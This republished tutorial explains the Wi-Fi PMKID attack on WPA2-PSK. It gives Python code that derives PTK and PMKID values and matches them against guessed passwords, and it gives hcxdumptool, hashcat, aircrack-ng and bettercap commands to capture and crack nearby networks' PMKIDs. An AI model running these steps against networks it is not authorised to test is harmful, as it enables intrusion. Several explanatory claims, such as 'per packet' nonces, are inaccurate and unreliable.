Mastering the PMKID Attack: A Step‑by‑Step Guide to Wi‑Fi Penetration Testing

This article walks through the theory and practical exploitation of the Wi‑Fi PMKID attack, covering authentication basics, the WPA/WPA2 handshake, PMKID generation, and detailed step‑by‑step instructions using tools such as hcxdumptool, hashcat, aircrack‑ng, Airgeddon and bettercap to capture and crack PMKID hashes.

Black & White Path

Open System Authentication

Open System Authentication (OSA) is the authentication process defined in the original WEP protocol, allowing a client to connect to any WEP network.

Client discovers SSID and sends a connection request.

AP returns a response.

Client sends an association or authentication request.

AP generates a session‑specific authentication code and sends it to the client.

Open System Authentication

Shared Key Authentication

Shared Key Authentication is a WEP authentication method that requires the client and the AP to share the same pre‑shared Wi‑Fi password.

Client discovers SSID and sends a connection request.

AP sends an encrypted file that can only be decrypted with the Wi‑Fi password.

Client enters the password and sends an authentication request frame.

AP validates the decrypted file and grants access if the key is correct.

Shared Key Authentication

WPA/WPA2 PSK Overview

The article focuses on WPA2‑PSK (pre‑shared key) authentication and the unicast mode between AP and client.

PSK is derived from the passphrase and the SSID as:

PSK = PBKDF2(HMAC‑SHA1, Wi‑Fi password, SSID, 4096 iterations, 256 bits)

The SSID is the salt (the reference implementation also takes the SSID length as a parameter), so the same password yields a different PSK on every network name.

In WPA2‑PSK the pre‑shared key is the Pairwise Master Key (PMK). The actual traffic encryption key is derived from the PMK.

PTK = PMK + Anonce + Snonce + MAC(AP) + MAC(Supplicant)

Authenticator = AP

Supplicant = Client

Anonce = AP‑generated random nonce per packet

Snonce = Client‑generated random nonce per packet

For broadcast/multicast the keys become GTK and GMK, derived from the master session key.

Four‑Way Handshake

The four‑way handshake converts source key material into data‑encryption material.

Both client and AP know the PMK, but the PMK itself is not used directly for encrypting data; a PTK is derived from it.

Handshake steps (simplified):

AP sends Anonce; client generates PTK using PMK, MAC addresses, Anonce and its own Snonce.

Client returns Snonce; AP generates the same PTK and includes a MIC field set to 1.

AP derives GTK from GMK, encrypts it with PTK, and sends it to the client.

Client confirms key installation.

Four‑Way Handshake
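The handshake steps above say that both sides compute the same PTK from PMK, the two MAC addresses and the two nonces, and that message 2 carries a MIC. The following added example (not code from the original article) implements that derivation as IEEE 802.11i specifies it: PRF‑384 built from HMAC‑SHA1, the PTK split into KCK/KEK/TK, and the message MIC computed with the KCK over an EAPOL‑Key frame whose MIC field is zeroed. The PMK, nonces, MAC addresses and frame bytes are constructed placeholders for the demonstration; the MIC offset of 81 is the position of the Key MIC field in an EAPOL‑Key frame counted from the EAPOL version byte.

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame, counted from
# the EAPOL version byte: 4 (EAPOL hdr) + 1 (descriptor type) + 2 (key info)
# + 2 (key length) + 8 (replay counter) + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (ID)
MIC_OFFSET = 81
MIC_LEN = 16


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        block = label + b"\x00" + data + bytes([counter])
        out += hmac.new(key, block, hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, mac_ap: bytes, mac_sta: bytes,
               anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-384(PMK, "Pairwise key expansion",
                     min(MAC)||max(MAC)||min(nonce)||max(nonce)).
    Ordering by value is why both sides reach the same key regardless of role."""
    data = (min(mac_ap, mac_sta) + max(mac_ap, mac_sta)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)   # 48 bytes for CCMP
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the frame with the
    MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def verify_eapol_mic(kck: bytes, frame: bytes) -> bool:
    """True when the MIC embedded in the frame was produced with this KCK."""
    embedded = frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, frame), embedded)


def build_message2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed minimal EAPOL-Key message 2 (key info/replay counter left
    zero) with SNonce in place and a valid MIC filled in."""
    header = bytes(4 + 1 + 2 + 2 + 8)            # EAPOL hdr + descriptor fields
    body = header + snonce + bytes(16 + 8 + 8)   # nonce, IV, RSC, ID
    frame = body + bytes(MIC_LEN) + b"\x00\x00"  # zero MIC, key data length 0
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


# Constructed placeholder values (not captured traffic)
PMK = bytes(range(32))
MAC_AP = bytes.fromhex("021122334455")
MAC_STA = bytes.fromhex("02aabbccddee")
ANONCE = bytes([0xA5] * 32)
SNONCE = bytes([0x5A] * 32)

if __name__ == "__main__":
    ap_side = derive_ptk(PMK, MAC_AP, MAC_STA, ANONCE, SNONCE)
    sta_side = derive_ptk(PMK, MAC_STA, MAC_AP, SNONCE, ANONCE)
    msg2 = build_message2(sta_side["kck"], SNONCE)
    print("PTK identical on both sides:", ap_side == sta_side)
    print("AP accepts message 2 MIC:", verify_eapol_mic(ap_side["kck"], msg2))
```

The PTK never leaves either device; what an observer sees is the nonces, MAC addresses and the MIC, which is why handshake capture requires a client and why a wrong PMK simply fails the MIC check.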

PMK Cache and PMKID

After a successful handshake, the AP and client maintain a PMK Security Association (PMKSA) cache.

PMKSA = PMKID + PMK lifetime + MAC addresses + other variables.

PMKID = HMAC‑SHA1‑128(PMK, "PMK Name" + MAC(AP) + MAC(Supplicant))

HMAC‑SHA1‑128 means the 160‑bit HMAC‑SHA1 output truncated to its first 128 bits (16 bytes).

The router stores the PMKID; on subsequent connections it can validate the PMKID instead of performing the full handshake, reducing roaming latency.

PMKID Attack Principle

Only routers with roaming enabled expose the PMKID vulnerability.

Attack flow:

Capture PMKID → guess Wi‑Fi password with a dictionary → derive PMK → compute PMKID → compare with captured PMKID.

Wi‑Fi password (guessed)

Wi‑Fi SSID (known)

SSID length (known)

MAC addresses of AP and client (known)

PMK Name string (known)
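Everything in the list above except the password is public, so the derivation in the PSK and PMKID sections reduces to a single secret input. The added example below (written for this page, not code from the original article or from hashcat) carries the two formulas through in Python: PBKDF2‑HMAC‑SHA1 for the PMK, HMAC‑SHA1‑128 for the PMKID, and a parser for the hashcat mode 16800 line format (PMKID*MAC_AP*MAC_STA*ESSID_hex). The PMK derivation is checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE"); the MAC addresses and passphrase in the lab record are constructed placeholders. The same check is what lets a network owner confirm, offline, whether their own passphrase would fall to a given wordlist.

```python
import hashlib
import hmac

# Publicly documented IEEE 802.11i Annex H vector: passphrase "password",
# SSID "IEEE" -> this 256-bit PSK. Used only to confirm the derivation.
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK (= PMK under WPA2-PSK) = PBKDF2-HMAC-SHA1(passphrase, salt=SSID,
    4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_hashcat_16800(line: str) -> dict:
    """Parse one hashcat -m 16800 line: PMKID*MAC_AP*MAC_STA*ESSID_hex."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": bytes.fromhex(ap_hex),
        "mac_sta": bytes.fromhex(sta_hex),
        "ssid": bytes.fromhex(essid_hex).decode(),
    }


def pmkid_matches(candidate: str, rec: dict) -> bool:
    """True when the candidate passphrase reproduces the recorded PMKID."""
    pmk = derive_pmk(candidate, rec["ssid"])
    computed = compute_pmkid(pmk, rec["mac_ap"], rec["mac_sta"])
    return hmac.compare_digest(computed, rec["pmkid"])


def make_16800_line(passphrase: str, ssid: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build a 16800 record for a network whose passphrase is known (lab use),
    so the verification path can be exercised without any capture."""
    pmkid = compute_pmkid(derive_pmk(passphrase, ssid), mac_ap, mac_sta)
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


# Constructed lab record: passphrase and MAC addresses are placeholders.
LAB_PASSPHRASE = "correct horse battery staple"
LAB_LINE = make_16800_line(LAB_PASSPHRASE, "IEEE",
                           bytes.fromhex("021122334455"), bytes.fromhex("02aabbccddee"))

if __name__ == "__main__":
    pw, ssid, expected = IEEE_VECTOR
    print("IEEE vector reproduced:", derive_pmk(pw, ssid).hex() == expected)
    rec = parse_hashcat_16800(LAB_LINE)
    print("lab passphrase matches:", pmkid_matches(LAB_PASSPHRASE, rec))
    print("'password' matches:", pmkid_matches("password", rec))
```

The 4096‑round PBKDF2 is the only expensive step, and it is fixed by the standard; nothing in the PMKID construction adds work per guess, which is why passphrase entropy (or WPA3's SAE, which has no offline‑checkable PMKID) is the mitigation the conclusion points to.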

Hashcat lists the following advantages for the PMKID attack:

No legitimate client needed ("no‑client" attack).

No need to wait for a full four‑way handshake.

Avoids retransmission issues of EAPOL frames.

Unaffected by client password entry errors.

Works even when the client is out of range.

Faster because fixed nonces and replay counters are not required.

Produces a simple hexadecimal hash string, no special capture formats needed.

Capturing PMKID with hcxdumptool

Install the required tools and put the Wi‑Fi adapter into monitor mode:

apt install hcxdumptool hcxtools
airmon-ng start wlan0

Capture PMKID frames from all surrounding APs:

hcxdumptool -o demo -i wlan0mon --enable_status 5

Option --enable_status 5 shows only authentication and EAP/EAPOL frames; PMKID can also be captured with status 1.

Using hcxdumptool to capture PMKID

Converting and Cracking with hashcat

Convert the captured pcapng file to a hashcat‑compatible hash file named hash (the original renamed it to pmkidhash):

hcxpcaptool -z hash demo

Run hashcat in PMKID mode (16800) against the wordlist, then print the recovered password from the potfile with --show:

hashcat -m 16800 --force hash /usr/share/wordlists/rockyou.txt
hashcat -m 16800 hash --show
hashcat cracking PMKID
hashcat cracking result

Targeted Capture of a Single AP

Record the target AP’s MAC address in a file named target. Then capture only that AP’s PMKID:

hcxdumptool -o raj -i wlan0mon --enable_status=1 --filterlist_ap=target --filtermode=2

Convert and crack as before:

hcxpcaptool -z pmkidhash raj
hashcat -m 16800 --force pmkidhash /usr/share/wordlists/rockyou.txt
hashcat -m 16800 pmkidhash --show
Using filterlist_ap parameter
PMKID capture success

Alternative Tools: aircrack‑ng, Airgeddon, bettercap

Convert the pcapng file to pcap and crack directly with aircrack‑ng:

file demo
tcpdump -r demo -w demo.pcap
aircrack-ng demo.pcap -w /usr/share/wordlists/rockyou.txt
aircrack‑ng cracking success

Airgeddon provides a menu‑driven CLI that automates the entire PMKID capture and cracking workflow with a few numeric selections.

Using bettercap (after installing an older libpcap version) the steps are:

wget http://old.kali.org/kali/pool/main/libp/libpcap/libpcap0.8_1.9.1-4_amd64.deb
dpkg -i libpcap0.8_1.9.1-4_amd64.deb
bettercap
set wifi.interface wlan0mon
wifi.recon on
wifi.show
wifi.assoc 68:14:01:5a:0e:9c
bettercap scanning AP

Captured PMKID is saved to /root/bettercap-wifi-handshakes.pcap. Convert and crack with hashcat as shown earlier.

bettercap cracking PMKID

Conclusion

The PMKID attack poses a serious threat to both home and enterprise Wi‑Fi networks because it can be performed without a legitimate client and without capturing a full four‑way handshake. Using strong passwords and migrating to WPA3 are essential mitigations.


This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
